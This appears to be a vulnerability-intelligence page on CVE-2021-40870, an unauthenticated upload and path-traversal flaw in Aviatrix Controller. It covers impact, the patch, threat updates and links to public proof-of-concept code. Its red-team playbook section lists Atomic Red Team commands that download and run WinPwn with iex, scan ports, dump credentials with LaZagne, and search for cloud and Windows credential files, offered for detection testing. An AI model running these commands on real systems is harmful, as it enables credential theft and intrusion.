CVE-2021-40870
Overview
This vulnerability is a directory traversal flaw in the Aviatrix Controller software prior to version 6.5-1804.1922. It arises from insufficient validation of file upload paths, allowing attackers to specify arbitrary file locations. The affected component is the file upload handling mechanism within the web backend endpoints, which fails to restrict dangerous file types and path traversal sequences.
Vulnerability Description
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
Impact
An unauthenticated attacker can exploit this flaw to upload and execute arbitrary PHP code on the server, resulting in full remote command execution. No user credentials or interaction are required to trigger the vulnerability. Successful exploitation can lead to complete system compromise, unauthorized access to sensitive data, and potential lateral movement within the network environment.
Solution
Upgrade Aviatrix Controller to version 6.5-1804.1922 or later as detailed in the vendor's security advisory at https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021. The update includes validation improvements for file uploads to prevent directory traversal and code execution. Administrators should apply this patch promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Aviatrix Controller versions prior to 6.5-1804.1922 allows for the unrestricted upload of files with potentially dangerous types, enabling an unauthenticated user to execute arbitrary code through directory traversal. This flaw arises from inadequate input validation mechanisms that fail to properly restrict file types and paths during the upload process. Attackers can exploit this weakness by crafting a malicious file, which, when uploaded, can be executed on the server, leading to unauthorized access and control over the affected system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may leverage social engineering tactics to trick a user into uploading a malicious file, or they may directly interact with the upload functionality if it is exposed on the internet. Once the file is successfully uploaded, the attacker can execute arbitrary commands on the server, potentially leading to a full compromise of the system. This could involve executing scripts that manipulate data, install backdoors, or pivot to other systems within the network, significantly increasing the attack surface.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on the Aviatrix Controller for cloud networking and security management. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to severe consequences, including data breaches, loss of sensitive information, and disruption of services. The business risks associated with such an incident can be profound, encompassing financial losses, reputational damage, and regulatory penalties, especially if customer data is compromised. Organizations may also face increased scrutiny from stakeholders and potential legal ramifications.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to ensure that all instances of the Aviatrix Controller are updated to the latest version, which addresses this flaw. Regular patch management practices should be established to minimize exposure to known vulnerabilities. Additionally, organizations should employ web application firewalls (WAFs) to monitor and filter incoming traffic, specifically targeting file upload functionalities to prevent malicious file types from being processed. Implementing strict input validation and sanitization measures can further reduce the risk of exploitation. Regular security assessments, including penetration testing and vulnerability scanning, should be conducted to identify and remediate potential weaknesses in the system.
In conclusion, the vulnerability in the Aviatrix Controller presents a significant threat to organizations utilizing this product. The potential for unauthorized code execution through unrestricted file uploads poses serious risks that can lead to severe operational and financial consequences. By adopting proactive detection and mitigation strategies, organizations can better protect their systems and data from exploitation, ensuring a more secure cloud networking environment.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-40870, coinciding with the emergence of new proof-of-concept exploits publicly available on multiple platforms. Although the EPSS score shows a slight decline, our telemetry indicates increased adversary interest and active probing consistent with attempts to leverage the directory traversal vulnerability for unauthorized code execution. This shift underscores a growing operationalization of the flaw beyond theoretical research, raising the likelihood of real-world attacks. For defenders, this signals an elevated threat environment where opportunistic and potentially sophisticated actors may exploit unpatched Aviatrix Controller instances. Consequently, the risk level associated with this vulnerability has intensified, warranting heightened vigilance despite the marginal EPSS decrease, as exploitation activity trends suggest expanding adversary capability and intent.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-40870, with telemetry indicating a sustained increase in exploitation attempts targeting unpatched Aviatrix Controller instances. This uptick coincides with a slight rise in the EPSS score, reflecting growing adversary interest and operational momentum. Notably, new proof-of-concept exploits have surfaced on public platforms, broadening the accessibility of attack methods to a wider range of threat actors. The proliferation of these exploits, combined with the vulnerability’s critical severity and unauthenticated attack vector, significantly elevates the risk of successful compromise. For defenders, this evolving landscape underscores the urgency of monitoring for exploitation indicators and reinforces the heightened threat posture surrounding this vulnerability. The cumulative effect of increased exploitation activity and expanding exploit availability justifies an elevated risk assessment, signaling a transition from theoretical risk to active exploitation in the wild.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Aviatrix | Controller | All |
cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
|
|
|
Aviatrix | Controller | All |
cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
|
|
|
Aviatrix | Controller | All |
cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
|
|
|
Aviatrix | Controller | All |
cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
0xAgun/CVE-2021-40870
Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file which allows an unauthenticated user to exec...
|
0xAgun | 16 | 4 | 2021-10-07 | View |
|
orangmuda/CVE-2021-40870
Aviatrix allows an authenticated user to execute arbitrary code
|
orangmuda | 3 | 3 | 2021-10-07 | View |
|
JoyGhoshs/CVE-2021-40870
Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code
|
JoyGhoshs | 2 | 2 | 2021-10-08 | View |
|
System00-Security/CVE-2021-40870
Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code
|
System00-Security | 0 | 1 | 2021-10-07 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-139 | Relative Path Traversal |
50%
|
High | High | |
| CAPEC-76 | Manipulating Web Input to File System Calls |
37%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-40870 |
| docs.aviatrix.com |
GitHub CVE
x_refsource_MISC
|
https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 |
| wearetradecraft.com |
GitHub CVE
x_refsource_MISC
|
https://wearetradecraft.com/advisories/tc-2021-0002/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-40870 |